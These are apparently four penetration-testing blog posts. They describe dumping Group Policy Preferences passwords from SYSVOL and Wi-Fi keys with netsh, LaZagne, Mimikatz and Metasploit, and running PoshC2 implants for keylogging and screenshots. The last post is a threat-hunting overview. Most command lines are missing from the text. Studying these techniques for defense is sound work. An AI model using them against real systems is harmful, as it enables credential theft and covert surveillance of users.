Credential Dumping: Group Policy Preferences (GPP)

People might be aware of “Group Policy Preferences” in Windows Server 2008 that allows system administrators to set up specific configurations. It can be used to create a username and encrypted password on machines. But do you know, that a normal user can elevate privilege to local administrator and probably compromise the security of the entire domain because passwords in preference items are not secured.

Table of Content

  • What is Group Policy Preferences?
  • Why using GPP to create a user account is a bad Idea?
  • Lab Setup Requirement
  • Create an Account in Domain Controller with GPP
  • Exploiting Group Policy Preferences via Metasploit -I
  • Exploiting Group Policy Preferences via Metasploit -II
  • Gpp-Decrypt
  • GP3finder
  • Powershell Empire

What is Group Policy Preferences?

Group Policy preferences shortly term as GPP permit administrators to configure and install Windows and application settings that were previously unavailable using Group Policy. One of the most useful features of Group Policy Preferences (GPP) is the ability to store, and moreover, these policies can make all kinds of configuration changes to machines, like:

  • Map Drives
  • Create Local Users
  • Data Sources
  • Printer configuration
  • Registry Settings
  • Create/Update Services
  • Scheduled Tasks
  • Change local Administrator passwords

Why using GPP to create a user account is a bad Idea?

If you use Microsoft GPP to create a local administrator account, consider the safety consequences carefully. Since the password is stored in SYSVOL in a preferred item. SYSVOL is the domain-extensive share folder in the Active Directory accessed by all authenticated users.

All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

When a new GPP is created for the user or group account, it’ll be interrelated with a Group.XML file created in SYSVOL with the relevant configuration information and the password is AES-256 bit encrypted. Therefore the password is not secure at all authenticated users have access to SYSVOL.

“In this article, we will be doing active directory penetration testing through Group Policy Preferences and try to steal store password from inside SYSVOL in multiple ways”.

Let’s Start!!

Lab Setup Requirement

  • Microsoft Windows Server 2008 r2
  • Microsoft Windows 7/10
  • Kali Linux

Create an Account in Domain Controller with GPP

On your Windows Server 2008, you need to create a new group policy object (GPO) under “Domain Controller” using Group Policy Management.

Now create a new user account by navigating to Computer Configuration > Control Panel Settings > Local Users and Groups.

Then Right click in the “Local Users and Groups” option and select the New > Local User.

Then you get an interface for new local user property where you can create a new user account.

As you can observe from the given below image, we had created an account for user “raaz”.

Don’t forget to update the group policy configuration.

So as I had already discussed above, that, whenever a new gpp is created for the user or group account, it will be associated with a Group.XML which is stored inside /SYSVOl.

From the image below, you can see the entire path that leads to the file Group.xml. As you can see, this XML file holds cpassword for user raaz within the property tags in plain text.

Exploiting Group Policy Preferences via Metasploit -I

As we know an authorized user can access SYSVOL and suppose I know the client machine credential, let say raj: [email protected] then with help of this I can exploit Group Policy Preference to get the XML file. Metasploit auxiliary module lets you enumerate files from target domain controllers by connecting to SMB as the rouge user.

This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft’s public AES key. This module has been tested successfully on a Win2k8 R2 Domain Controller.

Hence you can observe, that it has dumped the password:[email protected] from inside Group.xml file for user raaz.

Exploiting Group Policy Preferences via Metasploit -II

Metasploit also provide a post exploit for enumerating cpassword, but for this, you need to compromised target’s machine at least once and then you will be able to run below post exploit.

This module enumerates the victim machine’s domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft’s public AES key. Cached Group Policy files may be found on end-user devices if the group policy object is deleted rather than unlinked.

From the given below image you can observe, it has been found cpassword twice from two different locations:

  • C:\ProgramData\Microsoft\Group Policy\History\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml
  • C:\Windows\SYSVOL\sysvol\Pentest.Local\Policies\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

Gpp-Decrypt

Another method is to connect with the target’s machine via SMB and try to access /SYSVOL with the help smbclient. Therefore execute its command to access shared directory via authorized account and then move to following path to get Group.xml file: SYSVOL\sysvol\Pentes.Local\Policies\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

As you can observe, we have successfully transfer Group.xml in our local machine. As this file holds cpassword, so now we need to decrypt it.

For decryption, we use ” gpp-decrypt” which is embedded in a simple ruby script in Kali Linux which decrypts a given GPP encrypted string.

Once you got access to Group.xml file, you can decrypt cpassword with the help of the following syntax:

As a result, it dumps password in plain text as shown below.

GP3finder

This is another script written in python for decrypting cpassword and you can download this tool from here.

Once you got access to Group.xml file, you can decrypt cpassword with the help of the following syntax:

As a result, it dumps password in plain text as shown below.

PowerShell Empire

This another framework just like Metasploit where you need to access low privilege shell. once you exploit the target machine then use privesc/gpp module to extract the password from inside Group.xml file.

This module Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

As a result, it dumps password in plain text as shown below.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Credential Dumping: Wireless

Today we will be taking a look at how we can dump Wireless Credentials. We will cover Credential Dumping, Red Teaming, Different ways we can get those pesky wireless credentials.

Table of Content

  • What is Credential Dumping?
  • Credential Dumping in Real Life
  • Credential Dumping and Red Teaming
  • Credential Dumping Methods
    • netsh
    • WirelessKeyView
    • Wifi Network Properties
    • LaZagne
    • Mimikatz
    • Metasploit Framework
  • Mitigation

What is Credential Dumping?

When the term password cracking is used in the cyber world, it is being used as a broad concept as it shelters all the methods related to attacking/dumping/retrieving passwords of the victim/target. But today, in this article we will solely focus on a technique called Credential Dumping.

Credential dumping is said to be a technique through which username and passwords are extracted of any login account from the target system. It is this technique that allows an attacker to get credentials of multiple accounts from one person. And these credentials can be of anything such as a bank, email account, social media account, wireless networks.

Credential Dumping in Real Life

When an attacker has access to the target system and through that access, they successfully retrieve the whole bunch of their credentials. Once you are inside the target’s system, there are multiple methods to retrieve the credentials of a particular thing. For instance, to redeem all the names and passwords of the wireless networks to which the operating system has connected, there are various methods that an attacker can use and we will try and cover all of those methods here in our article. Now another thing to focus on is that this dumping of credentials can be done both in internal penetration testing and external penetration testing, it depends on the methodology, perspective or subjectivity of the attack on the bases of which the best suitable method can be decided.

Credential Dumping Methods

Just like the instance presented above, we will portray various methods to dump wireless credentials from a system in this article. So, let’s get started, shall we?

Manual Credential Dumping

All the Wi-Fi password with their respective SSID are stored in an XML file. The location of these files is C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\***. Here, you will find that SSID of wifi is saved in clear text whereas passwords are stored as keys.

Credential Dumping using netsh

Netsh is a scripting utility provided by Microsoft itself. It can be used both in command prompt or Windows PowerShell. Netsh is short for network shell. When executed, it provides detailed information about the configuration of the network that the system ever had; including revealing the credentials of wireless networks that it has ever been connected to. This utility comes with various parameters that can be used to get various information as per the requirement. This method can be used both in internal and external penetration testing as netsh commands can be executed both locally and remotely.

To get the list of the SSIDs that the device has been connected to use the following command:

And as a result of the above command, you can see the names of the Wi-Fi networks that the system was connected to in the past or present such as Meterpreter, Linuxlab, etc. The same has been demonstrated in the image above.

Further, to know the passwords of any one of the mentioned SSIDs use the following command :

And just like it is shown in the image above, the result of the above command will give you the password.

Credential Dumping using WirelessKeyView

A wireless key view is a simple software accesses the XML files where wireless passwords are stored and reveals them in cleartext. This tool was developed to recover lost and forgotten password of a wireless network. This is the perfect method for credential dumping in internal network penetration testing. To utilize this method simply download the tool from here and run it, you will get all the Wi-Fi names and its password as shown in the image below:

Credential Dumping using Wifi Network Properties

Our next method is manual, it is good when you are introduced to the network to work but for some reason, the password of the network isn’t revealed to you. Then you can use this method, as it falls under the category of internal penetration testing methodology. To reveal the password of a wireless network manually, go to Control Panel > Network and Internet > Network and Sharing Center and then click on Wi-Fi (*SSID*). A dialogue box will open, in that box click Wireless Properties button in the upper pane. Next, go to Security tab and you can see the password there just as it is shown in the image below:

Credential Dumping using LaZagne

LaZagne is an open-source tool that was developed to retrieve all the passwords stored in your machine. We have covered LaZagne in our other article, which you can read from here. In our experience, LaZagne is an amazing tool for credential dumping and its the best tool to be used for external penetration testing. To extract Wi-Fi password with LaZagne, simply download the tool from here and run it remotely using it following command :

After running the above command, all the Wi-Fi-related passwords with their respective SSID will be extracted.

Credential Dumping using Mimikatz

Another method that can be very useful in external penetration testing is using Mimikatz. We have covered various features of Mimikatz in our other article, which you can find here. Once you have the victim’s session use the following commands to get the passwords:

And very easily you will have all the passwords at your service as shown in the image above.

Credential Dumping using Metasploit Framework

Then our next method is to use Metasploit to retrieving desired passwords. As all of us know that Metasploit is a framework that provides us with already constructed exploits to make pentesting convenient. And is an amazing platform for a beginner and expert in hacking pentesting world.

Now, to dump credentials there comes an in-built post exploit in the Metasploit and to run the said exploit; go to the terminal of Metasploit by typing msfconsole and get the session of you to the target system using any exploit you prefer. And then background the session use the post-exploit for extracting desired Wi-Fi credentials by using the following commands:

And just as it is shown in the image above, you will have your credentials.

Mitigation

There are various measures that you can follow in order to protect yourself from credential dumping attacks. These measures are given below:

  • Keep you employees/employers aware
  • DO NOT use default SSID of a wireless network
  • Do not save the passwords on the system
  • Always reconnect to a Wi-Fi manually.
  • Have a different network for guests
  • Use VPN
  • Change your Wi-Fi password regularly
  • Use a different IP address instead of the default one
  • Make sure your modems don’t have reset button as most of the modems come with the reset button. When the said button is pressed, it brings back the default settings which doesn’t have any security layer and allows anyone to connect.

So, these were the methods to dump wireless credentials. Apply the suggested mitigation to your systems or networks in order to keep yourself safe from attackers. I hope these were useful and keep tuning in for various hacking techniques!

We are well aware these are tough times for everyone and, we, here at hacking articles hope and pray that everyone is safe and following the measure of self-quarantine. And for all the hacking/pen-testing enthusiasts we are working hard to bring more and more new content so that you can learn new things and use this self-isolation to its best. Stay Safe and take care! Happy Hacking!

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

Command & Control: PoshC2

PoshC2 is an open-source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 primarily focuses on Windows implantation, it does contain a basic Python dropper for Linux/macOS.

Table of Content

  • Introduction
  • Features
  • Installation
  • Enumerate User Information
  • Enumerate Computer Information
  • Find All Vulnerabilities
  • Invoke ARP Scan
  • Get Key Strokes
  • Get Screenshot

Features of PoshC2

  • Highly configurable payloads, including default beacon times, jitter, kill dates, user agents and more.
  • A large number of payloads generated out-of-the-box which are frequently updated and are maintained to bypass common Anti-Virus products.
  • Auto-generated Apache Rewrite rules for use in C2 proxy, protecting your C2 infrastructure and maintaining good operational security.
  • A modular format allowing users to create or edit C#, PowerShell or Python3 modules which are run in-memory by the Implants.
  • Notifications on receiving a successful Implant, such as via text message or Pushover.
  • A comprehensive and maintained contextual help and an intelligent prompt with contextual auto-completion, history, and suggestions.
  • Fully encrypted communications, protecting the confidentiality and integrity of the C2 traffic even when communicating over HTTP.
  • Client/Server format allowing multiple team members to utilize a single C2 server.
  • Extensive logging. Every action and response is timestamped and stored in a database with all relevant information such as user, host, implant number, etc. In addition to this, the C2 server output is directly logged to a separate file.
  • Support for Docker, allowing reliable and cross-platform execution

Installation of PoshC2

We can install PoshC2 automatically for Python3 using the curl command. We need an elevated shell to execute this command successfully.

Now that we have installed the PoshC2 from the Github, we need to configure the listener to our IP Address. This can be done by editing the config file using the following command.

After the required configurations are done, we need to open 2 instances of the terminals. Running the server and the handler. We need to run the Implant Handler, used to issue commands to the server and implants.

Further, we will run the server which will communicate with the Implants and receive task output.

You can use any one of the methods to gain a session from the ones that are depicted in the image above. Know that, as soon as we run the payload on the target machine. It activates an implant in the Implant handler as shown in the image given below.

Enumerate User Information

Now that we have an active implant in our Posh, It’s time to run some inbuilt modules to get some information about the Target System. We are going to start with the User Information, Group Information. This module dumps all the local users, local groups and their membership on the Target Machine. It gathers all the information using the WMI. To initiate this module, we will be using the following command:

After working a while on the implant, we see that it has successfully enumerated all the user-related information from the target machine. We have information about the local users, local groups, number of local groups.

Enumerate Computer Information

As we already enumerated the user’s information, now its time to get the information about the system. For this, we will use this implant. It is an external implant that is integrated with Posh C2. This is a Windows Powershell Script that runs in the background by the same name. It uses the PSInfo from the Sysinternals to gain the information regarding the Computer Name, Domain, Operating System, OS Architecture and much more.

After working for a while on the implant, we see that it has successfully enumerated a lot of System related information from the target machine.

Find All Vulnerabilities

Now, comes the automated implant. This implant enumerates the target machine for a huge range of Local Privilege Escalation methods. It works quite similar to Windows Exploit Suggester. This is another Powershell script just like the previous implant that has been integrated into PoshC2. We can invoke this implant using the command given below:

After working for a while on the implant, we can see that it has successfully enumerated all the possible exploits that can be used to elevate privileges on this machine.

Invoke ARP Scan

We can perform an arp-scan on the implant. This is based on the Powershell ArpScanner and uses C# AssemblyLoad. This scan deploys [DllImport(“iphlpapi.dll”, ExactSpelling=true)] to Export ‘SendARP’; by default, it will loop through all interfaces and perform an arp-scan of the local network based on the IP Address and Subnet mask provided by the network adapter. It can be invoked as shown in the image given below:

Here, we can see that the arp-scan module has worked successfully giving us a list of IP Addresses that are in the same network as the target implant.

Get Key Strokes

Now, we will be trying to sniff out some keystrokes from our target implant. This can be done using the get-keystrokes module. This process is divided into 2 parts. First, we shall initiate the capturing and then we will read the captured keystrokes. Although this is an external module initially created in PowerShellMafia, it has changed the function to be in memory and not touch disk. We start capturing the keystrokes using the following command:

By default, the keylogger will run for 60 minutes. It has started the sniffing out the keystrokes as shown in the image given below:

Now to read those keystrokes, we need to run the following command:

This will show us all the keystrokes that have been performed by the target implant. This is better than other methods to sniff keystrokes because it also shows the function keys like Ctrl and Shifts key entries which can be quite helpful in some scenarios.

Get Screenshot

Now it’s time to get a look at our target’s system. This can be achieved using the get-screenshot module. This is a pretty straight forward method. We will initiate an implant that will help us get screenshots of the screen that is being used by the target at the time. This module is pretty useful as it helps is to get evidence or directly look at what the target is doing by capturing the live screen. You can initiate this module by using the following command:

As you can see in the following image, the above command has been executed successfully and we have captured the live screen of the target.

Just like it has been mentioned in the above image, you can navigate to the location of the screenshot and access the screen of the target. The screenshot captured by us is shown below:

Author: Kavish Tyagi is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

A Deep Drive on Proactive Threat Hunting

We all know that the proactive threat hunting is need of the hour and as we have already discussed the basic requirement that highlights all generic step required for Threat Hunting Activity in our previous article “Threat Hunting – A proactive Method to Identify Hidden Threat”.

In this post, you will learn what are the main factors that should be considered before conducting a threat hunting activity in any organisation. These key factors will help an organisation to prepare a roadmap of the hunting activity before execution.

Table of Content

  • The pyramid of Pain
  • Threat Hunting Techniques
  • Datasets
  • Hunting Maturity Model (HMM)

The Pyramid of Pain

The Pyramid of Pain, first proposed by security professional David J Bianco in 2013, concentrating on incident response and threat hunting in order to improve the applicability of attack indicators.

  • The Pyramid measures potential usefulness of your Intel
  • It also measures the difficulty of obtaining that Intel
  • The higher you are, the more resources your adversaries have to expend.

For example: If an attacker is using malware to exploit an endpoint within their attack chain and as a defender, the security professional is using file hash values to distinguish such actions, it is trivial for them to recompile the malware illustration such that the file hash value the team are using to detect the original sample, is rendered useless.

Hash Values: Identifying Indicator of compromise with the help of the corresponded hash values is a most trivial step. Unfortunately, they are extremely susceptible to change (even accidentally).

IP Addresses: An IPv4 or IPv6 address, in most cases netblocks or CIDR ranges also fit here.

An only foolish person uses their own addresses. VPNs, Tor, open proxies all make it easy to change the IP address.

If it’s hardcoded into a config, maybe adversaries have to do a little work to update it. We have found that attackers have begun to manipulate or confuse targets with malicious IP in DWORD format. The definition of a malicious URL is as follows:

“http:// 77683606/GoogleSearch.image”

IP to DWORD format

1)  This can be done by separating the original IP into four octets. Let’s take the above IP address, which is “74.21.11.150”. Split the IP address into four octets – 74, 21, 11 and 150.

2) Covert each octet into HEX and you will get “4a15b96” for all four octets.

3) Further, change HEX “4a15b96” into decimal and ultimately you will get “77683606” which is the DWORD form of the IP address.

Domain Names: This could be either a domain name itself (e.g., “freeinternet.net”) or maybe even a sub- or sub-sub-domain (e.g., “the.new.game.freeinternet.net”).

The attackers use the fast-flux or double flux to mask and safeguard their actual infrastructure. They compromised a range of easy targets like vulnerable computers or weak home routers. These routers are then used as tunnels for carrying command-control messages and data across the actual network

As per a report “APT1: Exposing One of China’s Cyber Espionage Units | Mandiant | FireEye” you can read how an attacker plan to get a domain registered for APT1.

1) The first persona, “UglyGorilla”, has been active in computer network operations since October 2004. His activities include registering domains attributed to APT1 and authoring malware used in APT1 campaigns. “UglyGorilla” publicly expressed his interest in China’s “cyber troops” in January 2004.

2)  The second persona, an actor we call “DOTA”, has registered dozens of email accounts used to conduct social engineering and spear-phishing attacks in support of APT1 campaigns. “DOTA” used a Shanghai phone number while registering these accounts.

3)  We have observed both the “UglyGorilla” persona and the “DOTA” persona using the same shared infrastructure, including FQDNs and IP ranges that we have attributed to APT1

Network/Host Artifacts: It is very difficult for an adversary to conduct any useful operation without leaving any traces, which ensures that any byte flowing through the network as a result of an adversary’s involvement may be an artefact.

For example, Classify the outbound traffic with a C&C server that will be viewed as network artifacts, while on hosts, search for files & folders, registry objects, mutexes, memory strings will be considered as host artifacts.

Tools: In this step, the hunter tries to investigate “what kind of program or command might be used by intruders to achieve their target” such as PowerShell, mimikatz, or other restriction circumvent commands for a lateral moment.

Tactics, Techniques and Procedures (TTPs): In this phase, the hunter attempts to examine “how the intruder achieves its target with the aid of the cyber-kill-chain” (as discussed in Part-I). They choose social engineering to target such as phishing, which is the most common TTP used to trap the user in order to gain a foothold in the network by linking a malicious object to the mail.

Threat Hunting Techniques

Skilled threat hunters use a variety of techniques when reviewing data sources such as firewall logs, SIEM and IDS warnings, DNS logs, file and network data, authentication systems, and other sources in order to detect IoCs and recognize the threat.

SEARCHING

This is the simplest and least difficult technique used in threat hunting. It is the process for querying data for specific artifacts using defined search criteria and tools. It involves environmental data to analyze like logs, alerts, memory dumps, system events etc. As a security professional who involves in threat hunt need to analyze more data so in starting of threat searching, it’s not possible to know exactly what you are looking for. So, there are two important factors need to keep in mind while doing a search:

  • Too wide hunting for common artifacts that can produce unnecessarily various results of very little use.
  • Focusing too specifically will lead to very few findings and prevent it from being concluded.

CLUSTERING

Clustering is an analytical process, typically performed using machine learning, involving the classification of related classes (or clusters) of data points based on certain behaviors from a wider range of data. In actual fact, the technique is popular in various fields such as machine learning, pattern recognition, retrieval of information, data compression and computer graphics, for statistical data analytics.

source: https://en.wikipedia.org/wiki/Cluster_analysis

A statistical technique in which groups of like data points established on specific aspects of a large data set are separated into groups. This is most effective when acting upon a broad group of data points that do not share behavioral characteristics. Clustering finds precise cumulative behaviors, like an unusual number of instances of a common occurrence through various applications such as outlier detection.

Read more from here: https://en.wikipedia.org/wiki/Cluster_analysis

GROUPING

The grouping includes taking a variety of different objects and determining when multiple objects come together based on common criteria. This consists of identifying common criteria that are used to group objects, such as incidents that occur within a given time period. It is best used when hunting for other artifacts which are equally or unusual.

The grouping is different from clustering as it is performed after clustering by looking at unusual data sets and of the researcher’s concern in order to see the root cause whereas clustering uses enormous quantities of data to classify data sets which require more analysis using the grouping technique.

STACKING

The stack counting is an analysis method used in a simulated haystack to find the needle. It is the most popular practice conducted by hunters to examine a hypothesis.

“You are familiar with the term, if you ever used the pivot tables of Microsoft Office, the stats command of Splunk or the “top” command of Arcsight”.

Data stacking is used to isolate and classify patterns by using frequency analyses in mass quantities of related data. It requires an algorithmic method of reducing vast volumes of data that can be processed and analyzed into manageable chunks.

In the context of a large data set, the investigator identifies the characteristics that differentiate the odd data rows and may prove that they are malicious. Instead, these attributes are the grouping parameters used to build estimates for the frequency analysis.

For example: To identify a thread count with the help of Process Explorer.

Datasets

The methods you use are all part of the strategy and experience of what you will do. If you don’t have sufficient details, but what is the right details, you can’t hunt? The response to that question is dependent on what you are aiming for, but the following is a broad list of datasets that are well suited for hunting and security:

Hunting Maturity Model (HMM)

The Hunting Maturity Model is developed by Sqrrl’s security architect and DavidJBianco. It measures the current maturity level of hunting of any organization based on the data collection, creates data analysis procedures, incident responses and hunting automation.

There are five levels of Hunting Maturity Model (HMM)

The increasing level of maturity is focused on how an organization has the ability to track and establish data analysis procedures (DAP) on the basis of the data it collects and its hunting automation. Analysts and managers will use the HMM to assess the current maturity and to build a roadmap.

HM0 – INITIAL: HM0 uses automated alerting tools, such as IDS, SIEM or antiviruses, mainly to identify malicious activities across the organization. They may provide signature update feeds or indicators of threats and even build their signatures or indicators, but these are fed directly into the monitoring system.

HM1-Minimal: An organization in HM1 still relies mainly on automatic warnings, but at least some routine IT data collection is carried out by them. They also utilize threat intelligence to drive

detection.

HM2-Procedural: At Level 2 maturity, an organization follows analysis procedures created by others. It has a high or very high level of routine data collection. They may periodically practice and adapt procedures developed by others and can make minor improvements but are not yet able to establish entirely new guidelines themselves.

HM3-Innovative:  At least a few hunters are present in HM3 organizations who understand different forms of data analysis techniques and are able to use these approaches to detect malicious activities. Such organizations are typically those which establish and publish procedures rather than depend upon procedures established by other parties (as in the HM2 case).

HM4-Leading:  HM4 is exactly the same as HM3, with a significant difference: automation. Every effective hunting process at HM4 will be introduced and translated into automatic detection. This liberates analysts from the pressure of continued implementation of the same processes and encourages them than to focus on developing current or new processes.

Keywords: Crown jewels analysis: Crown Jewels Analysis (CJA) is a process for identifying those cyber assets that are most critical to the accomplishment of an organization’s mission.

Reference:

https://www.threathunting.net/files/hunt-evil-practical-guide-threat-hunting.pdf

https://www.threathunting.net/files/huntpedia.pdf

Author: Nisha Sharma is trained in Certified Ethical hacking and Bug Bounty Hunter. Connect with her here